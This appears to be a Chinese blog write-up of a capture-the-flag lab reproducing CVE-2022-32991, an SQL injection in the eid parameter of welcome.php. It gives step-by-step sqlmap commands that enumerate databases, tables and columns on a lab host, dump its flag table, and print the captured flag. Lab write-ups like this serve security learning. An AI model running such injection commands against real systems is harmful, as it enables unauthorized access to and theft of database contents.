春秋云境:CVE-2022-32991[漏洞复现]

从CVE官网查询该漏洞相关信息

该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞

则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数


开启靶机

先在页面正常注册、登录一个账号。密码随便填

 进入了home目录,这里有三个话题可以选择开启

随便选择一个进行开启点击Start即可

进入后查看网页URL

 可以看到这里的URL地址就出现了welcome.php和eid参数


 使用自动化工具SQLMAP漏洞利用

爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch --dbs

拿到了四个数据库,继续选择ctf库进行爆表

 


 爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf --tables

再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf -T flag --columns

 

最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump 

 


flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-22 23:16:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-22 23:16:02       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-22 23:16:02       87 阅读
  4. Python语言-面向对象

    2024-04-22 23:16:02       96 阅读

热门阅读

  1. js 数组去重的6种方法

    2024-04-22 23:16:02       34 阅读
  2. LeetCode刷题--- 完全平方数

    2024-04-22 23:16:02       36 阅读
  3. Rust---泛型(Generics)

    2024-04-22 23:16:02       32 阅读
  4. git 代码仓库

    2024-04-22 23:16:02       35 阅读
  5. 如何将本地项目上传到gitlab

    2024-04-22 23:16:02       40 阅读
  6. 【Spring】@Scheduled 定时器注解使用

    2024-04-22 23:16:02       40 阅读
  7. iOS知识点 ---- 离屏渲染

    2024-04-22 23:16:02       35 阅读
  8. CentOS常见命令详解

    2024-04-22 23:16:02       40 阅读
  9. vueelementui+tabs选项卡样式更改-内容待递增

    2024-04-22 23:16:02       35 阅读
  10. 安卓平台下OkHttp3网络库的全面探讨与实践

    2024-04-22 23:16:02       37 阅读
  11. python selenium 获取伪类

    2024-04-22 23:16:02       39 阅读
  12. SCP收容物081~09

    2024-04-22 23:16:02       36 阅读
  13. 设计模式详解(十五)——模板方法模式

    2024-04-22 23:16:02       42 阅读